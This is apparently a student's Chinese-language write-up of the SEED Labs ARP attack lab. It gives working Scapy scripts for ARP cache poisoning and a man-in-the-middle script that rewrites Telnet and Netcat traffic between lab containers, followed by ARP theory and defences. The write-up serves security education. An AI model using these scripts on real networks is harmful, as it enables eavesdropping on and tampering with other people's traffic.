ARP攻击原理学习

Sat, 11 Apr 2026 14:03:02 +0800

准备

基本环境

我使用的是Ubuntu 24.04.4 LTS 64位的虚拟机

CPU：4 核
内存：8GB
硬盘：50GB
网络：NAT模式

刷新系统包

1
2

sudo apt update
sudo apt upgrade -y

安装基础工具与docker依赖

`1`	`sudo apt install git curl net-tools apt-transport-https ca-certificates software-properties-common`

添加 Docker 的官方 GPG 密钥以确保下载的软件包安全

1
2

curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o docker.gpg
sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg docker.gpg

将 Docker 的稳定版仓库添加到 APT 源中，再次更新软件源以包含 Docker 仓库中的包

1
2

echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update

安装 Docker CE（社区版）、Docker CE CLI 和 Containerd

`1`	`sudo apt install -y docker-ce docker-ce-cli containerd.io`

启动 Docker 服务并设置为开机自启

1
2

sudo systemctl start docker
sudo systemctl enable docker

安装docker compose

1
2
3

sudo apt install docker-compose-plugin
# 验证
docker compose version

遇到问题：验证时报错，没有显示docker版本

确认下载的文件
1
head -n 5 /usr/local/bin/docker-compose
显示Not Found，说明没有安装成功，卸载并重装
1
2
3
sudo rm -f /usr/local/bin/docker-compose
sudo rm -f /usr/bin/docker-compose
sudo rm -f /bin/docker-compose

实验环境

使用 git 下载实验文件

1
2

git clone https://github.com/seed-labs/seed-labs.git
cd seed-labs/category-network/ARP_Attack/Labsetup

启动实验环境：

1
2

sudo docker compose up -d
sudo docker ps

遇到问题：docker compose一切正常，但这里却报错/usr/local/bin/docker-compose:行 1:Not:未找到命令

判断是因为命令指向旧路径，清理 hash 缓存
1
hash -r
让 docker-compose 指向新版
1
sudo ln -s /usr/bin/docker /usr/local/bin/docker-compose
之后又报错：
1
2
the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion 
unable to get image 'handsonsecurity/seed-ubuntu:large': permission denied while trying to connect to the docker API at unix:///var/run/docker.sock
判断是执行权限不足，命令前加sudo解决

出现这个报错the attribute version is obsolete, it will be ignored, please remove it to avoid potential confusion

是因为docker-compose.yml 文件中的 version: 字段在 Docker Compose v1.27.0+ 和 v2 中已经被弃用，不再需要指定，因此手动编辑删除即可

记录三个主机：

Host A：10.9.0.5
Host B：10.9.0.6
Attacker：10.9.0.105

任务一：ARP 缓存投毒

ARP 协议本身不具备认证机制，主机在接收到 ARP 报文时，会根据报文中的 IP-MAC 映射信息更新本地缓存，而不会验证该信息的真实性。这使得攻击者可以通过构造伪造报文实现缓存投毒

Task 1.A：ARP Request 进行缓存投毒

实验目标：使 Host A 错误地将伪造 IP (10.9.0.99) 映射到攻击者指定的 MAC 地址

方法：构造 ARP Request，广播伪造数据包

进入容器 M

`1`	`sudo docker exec -it M-10.9.0.105 bash`

切换到共享目录并创建攻击脚本

1
2

cd /volumes
nano arp_request.py

代码如下：

#!/usr/bin/env python3
from scapy.all import *
eth=Ether(dst="ff:ff:ff:ff:ff:ff")
arp=ARP(
        op=1,
        psrc="10.9.0.99",
        pdst="10.9.0.5",
)
packet=eth/arp
sendp(packet,iface="eth0")

运行脚本

1
2

chmod +x arp_request.py
./arp_request.py

查看攻击者MAC

ip addr

打开另一个终端，进入容器 A 查看 ARP 缓存

1
2

sudo docker exec -it A-10.9.0.5 bash
arp -n

Host A 出现伪造 IP 10.9.0.99，对应攻击者 MAC 地址

结论：ARP Request 可直接生成伪造缓存，当 Host A 向该 IP 发起通信时，会把数据发到攻击者的 MAC

Task 1.B：ARP Reply 投毒

实验目标：验证未经请求的 ARP Reply 报文能否篡改受害者的 ARP 缓存

方法：构造 ARP Reply，广播伪造数据包，分别针对 Host A 缓存中存在和不存在的 IP 进行测试

缓存中不存在IP

在容器M构造 ARP Reply 包（op=2 ），宣告一个 Host A 缓存中不存在的 IP

`1`	`nano arp_reply.py`

修改脚本：op=2 ，psrc="10.9.0.98"

#!/usr/bin/env python3
from scapy.all import *
eth=Ether(dst="ff:ff:ff:ff:ff:ff")
arp=ARP(
        op=2,
        psrc="10.9.0.98",
        pdst="10.9.0.5",
)
packet=eth/arp
sendp(packet,iface="eth0")

运行脚本

1
2

chmod +x arp_reply.py
./arp_reply.py

在容器 A 查看 ARP 缓存，缓存没有新增

缓存中存在IP

在容器M构造 ARP Reply 包（op=2 ），宣告一个 Host A 缓存中存在的 IP，但修改其 MAC 地址

`1`	`nano arp_reply.py`

修改脚本：psrc="10.9.0.99"

加入一行：hwsrc="11:11:11:11:11:11"

#!/usr/bin/env python3
from scapy.all import *
eth=Ether(dst="ff:ff:ff:ff:ff:ff")
arp=ARP(
        op=2,
        psrc="10.9.0.99",
        pdst="10.9.0.5",
        hwsrc = "11:11:11:11:11:11",
)
packet=eth/arp
sendp(packet,iface="eth0")

运行脚本

1
2

chmod +x arp_reply.py
./arp_reply.py

在容器 A 查看 ARP 缓存， MAC 被篡改

结论：出于安全防御机制，Linux 系统通常不会为未请求过的 IP 创建新的 ARP 缓存条目，但会更新已有条目

Task 1.C：ARP 无端报文

实验目标：测试源 IP 和目的 IP 相同的特殊广播 ARP 报文的投毒效果

方法：在攻击者 M 中发送无端 ARP 广播包，分别针对 Host A 缓存中存在和不存在的 IP 进行测试

缓存中不存在IP

在容器M构造 ARP Gratuitous 包（psrc=pdst ），宣告一个 Host A 缓存中不存在的 IP

`1`	`nano arp_gratuitous.py`

修改脚本：psrc="10.9.0.98",pdst="10.9.0.98"

#!/usr/bin/env python3
from scapy.all import *
eth=Ether(dst="ff:ff:ff:ff:ff:ff")
arp=ARP(
        op=2,
        psrc="10.9.0.98",
        pdst="10.9.0.98",
        hwsrc = "11:11:11:11:11:11",
)
packet=eth/arp
sendp(packet,iface="eth0")

运行脚本

1
2

chmod +x arp_gratuitous.py
./arp_gratuitous.py

在容器 A 查看 ARP 缓存，缓存没有新增

缓存中存在IP

在容器M构造 ARP Gratuitous 包（psrc=pdst ），宣告一个 Host A 缓存中存在的 IP，但修改其 MAC 地址

`1`	`nano arp_gratuitous.py`

修改脚本：psrc="10.9.0.99",pdst="10.9.0.99"，hwsrc="aa:bb:cc:dd:ee:ff"

#!/usr/bin/env python3
from scapy.all import *
eth=Ether(dst="ff:ff:ff:ff:ff:ff")
arp=ARP(
        op=2,
        psrc="10.9.0.99",
        pdst="10.9.0.99",
        hwsrc = "aa:bb:cc:dd:ee:ff",
)
packet=eth/arp
sendp(packet,iface="eth0")

运行脚本

1
2

chmod +x arp_gratuitous.py
./arp_gratuitous.py

在容器 A 查看 ARP 缓存， MAC 被篡改

结论：与 Task 1.B 完全一致。无端 ARP 只能更新受害者缓存中已有的记录，无法凭空捏造新记录。

任务二：Telnet 中间人攻击

实验目标：拦截 Host A 与 Host B 之间的 Telnet 流量，并将用户输入的所有字母篡改为 A

双向投毒

攻击者持续发送 ARP 伪造包，使：

A 认为 B 的 MAC 是攻击者
B 认为 A 的 MAC 是攻击者

在容器M构造投毒脚本

`1`	`nano arp_poisoning_mitm.py`

代码如下：

#!/usr/bin/env python3
from scapy.all import *
import time

eth=Ether(dst="ff:ff:ff:ff:ff:ff")
arpab=ARP(
        op=1,
        psrc="10.9.0.6",
        pdst="10.9.0.5",
)
arpba=ARP(
        op=1,
        psrc="10.9.0.5",
        pdst="10.9.0.6",
)
packet1=eth/arpab
packet2=eth/arpba
while True:
	sendp(packet1,iface="eth0")
	sendp(packet2,iface="eth0")
	time.sleep(5)

运行脚本，可以看到M在持续广播数据包

1
2

chmod +x arp_poisoning_mitm.py 
./arp_poisoning_mitm.py

容器 A 查看 ARP 缓存，可以发现显示的是容器B的IP地址和攻击者的MAC

容器 B 查看 ARP 缓存，可以发现显示的是容器A的IP地址和攻击者的MAC

IP 转发

投毒完成后，攻击者实际上变成a与b的路由器，因此m开不开启IP转发会对A与B的通信产生影响

原来的终端不动，重新打开一个终端，进入容器M，关闭IP转发

`1`	`sysctl net.ipv4.ip_forward=0`

主机A ping主机B，发现大量丢包

数据包被骗到了 M 这里，但 M 关闭了路由转发功能，所以包被 M 直接丢弃了

攻击者开启IP转发

`1`	`sysctl net.ipv4.ip_forward=1`

主机A ping主机B，发现没有丢包

ping的过程中攻击者打开icmp监听

`1`	`tcpdump -i eth0 icmp`

可以看到大量 ICMP 重定向消息

M 开启了转发，所以包能到达 B。但 M 发现 A 其实可以直接联系 B（在同一个子网），于是 M 遵守 ICMP 协议提醒 A 走错了路。

数据篡改

在攻击者 M 中关闭IP转发，随后通过 Python 篡改脚本来实现篡改信息内容的目的

在容器M构造脚本

`1`	`nano mitm_tcp.py`

遇到问题：输入以后什么也不显示

#!/usr/bin/env python3
from scapy.all import *

A_IP = "10.9.0.5"
B_IP = "10.9.0.6"

def process(pkt):
    if pkt.haslayer(IP) and pkt.haslayer(TCP):
        
        # A -> B
        if pkt.haslayer(Raw) and pkt[IP].src == A_IP and pkt[TCP].dport == 23:
            data = pkt[Raw].load
            newdata = b'A' * len(data)
            pkt[Raw].load = newdata
            del pkt[IP].chksum
            del pkt[TCP].chksum
            send(pkt)

        # B -> A
        elif pkt[IP].src == B_IP:
            del pkt[IP].chksum
            del pkt[TCP].chksum
            send(pkt)

sniff(filter="tcp", prn=process, store=0)

问题在于直接修改捕获到的原始数据包并重新发送，这种做法没有区分原始流量和自己注入的流量，很容易导致同一个包被反复抓取和处理，同时破坏了 TCP 连接的正常状态，进而触发大量重传，表现为卡顿甚至无响应。解决方法是获取攻击者网卡 MAC 地址并在处理前加一行 if 判断跳过自身发出的包

虽然显示成功了，但输入几个字符就会卡死
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/env python3
from scapy.all import *
import re

IP_A = "10.9.0.5"
IP_B = "10.9.0.6"

def spoof_pkt(pkt):
    # A -> B
    if pkt.haslayer(TCP) and pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
        if pkt[TCP].payload:
            old_data = pkt[TCP].payload.load
            new_data = re.sub(rb'[a-zA-Z]', b'A', old_data)
            
            # 构造新包并清除校验和让 Scapy 重新计算
            newpkt = IP(bytes(pkt[IP]))
            del(newpkt.chksum)
            del(newpkt[TCP].chksum)
            newpkt[TCP].payload = Raw(load=new_data)
            send(newpkt, verbose=False)
    
    # B -> A
    elif pkt.haslayer(TCP) and pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        send(newpkt, verbose=False)

f = f'tcp and (host {IP_A} and host {IP_B})'
sniff(iface='eth0', filter=f, prn=spoof_pkt)
虽然改成了重新构造数据包并做字符替换，结构上更规范，但仍然没有解决 TCP 流量一致性问题。修改 payload 后如果不正确处理序列号和确认号，同时又在 sniff 和 send 之间形成回灌，就会让通信双方的 TCP 状态不断偏移，最终进入持续重传的状态，连接变得不稳定甚至卡死

通过设置 store=0 减少 sniff 过程中的内存占用，结合 MAC 或流量方向过滤避免自身注入包被再次捕获造成回环处理，同时在 payload 修改时保持等长替换以降低 TCP 序列偏移带来的异常影响，从而显著缓解 Scapy 中间人脚本引起的卡顿与连接不稳定问题。

最终代码如下：

#!/usr/bin/env python3
from scapy.all import *
import re

IP_A = "10.9.0.5"
IP_B = "10.9.0.6"
# 获取攻击者自身的 MAC，用于过滤
MY_MAC = get_if_hwaddr("eth0")

def spoof_pkt(pkt):
    # 排除掉攻击者自己发出的包，防止死循环
    if pkt.src == MY_MAC:
        return

    # A -> B 
    if pkt.haslayer(TCP) and pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        
        if pkt[TCP].payload:
            data = pkt[TCP].payload.load
            newdata = re.sub(rb'[a-zA-Z0-9]', b'A', data)
            newpkt[TCP].payload = Raw(load=newdata)
        send(newpkt, verbose=False)

    # B -> A 
    elif pkt.haslayer(TCP) and pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        send(newpkt, verbose=False)

f = f'tcp and (host {IP_A} and host {IP_B})'

# store=0 杜绝内存卡死
sniff(iface='eth0', filter=f, prn=spoof_pkt, store=0)

关闭内核转发并运行脚本

如果不关闭，系统会抢在你的脚本之前把包发走，篡改就失效了

1
2
3

sysctl net.ipv4.ip_forward=0
chmod +x mitm_tcp.py
./mitm_tcp.py

同时运行双向投毒脚本和mitm脚本，然后主机A对B发起Telnet连接

`1`	`telnet 10.9.0.6`

在登陆这里输入任何字符都会变成 A，说明数据在传输过程中被修改

任务三：Netcat 中间人攻击

目标：精准替换字符串

步骤：

建立连接：

# B
nc -lp 9090

# A
nc 10.9.0.6 9090

攻击者：

sysctl net.ipv4.ip_forward=1
# 建立连接后
sysctl net.ipv4.ip_forward=0
python3 mitm_tcp.py

发送：

`1`	`seedlabs`

结果：

`1`	`AAAAAAAA`

二、ARP 攻击原理

ARP 协议原理

ARP 用于建立： IP地址 ↔ MAC地址映射关系

通信流程：

广播 ARP 请求
目标主机响应
返回 MAC 地址
写入缓存

ARP 缓存机制

每个主机维护缓存表

特点：

有超时（约 60–120 秒）
可被更新覆盖

安全问题

ARP 是无状态协议

任何主机收到 ARP 响应： → 直接更新缓存

导致： ARP 可被欺骗

ARP 缓存中毒攻击

原理：伪造 ARP 响应

攻击过程：

发送假 ARP
受害者更新缓存
流量流向攻击者
实现中间人攻击

攻击效果

窃听通信
篡改数据
会话劫持
拒绝服务

防御方法

静态 ARP 绑定
动态 ARP 检测（DAI）
端口安全
使用加密协议（HTTPS / SSH）

实验核心结论总结

ARP Request：可以直接创建伪造记录

ARP Reply：只能修改已有记录

MITM 成功条件：

双向投毒
控制流量路径

TCP 篡改关键点：数据长度必须一致，否则连接会断开

参考

Ubuntu 24.04 安装 docker 并配置镜像源 - 知乎

docker-compose提示version告警原因 | GaGa’s Blog

彻底搞懂系列之：ARP协议 - 知乎

网络安全 on Thaumazein's Shelter

ARP攻击原理学习

准备

基本环境

实验环境

任务一：ARP 缓存投毒

Task 1.A：ARP Request 进行缓存投毒

Task 1.B：ARP Reply 投毒

缓存中不存在IP

缓存中存在IP

Task 1.C：ARP 无端报文

缓存中不存在IP

缓存中存在IP

任务二：Telnet 中间人攻击

双向投毒

IP 转发

数据篡改

任务三：Netcat 中间人攻击

二、ARP 攻击原理

ARP 协议原理

ARP 缓存机制

安全问题

ARP 缓存中毒攻击

攻击效果

防御方法

实验核心结论总结

参考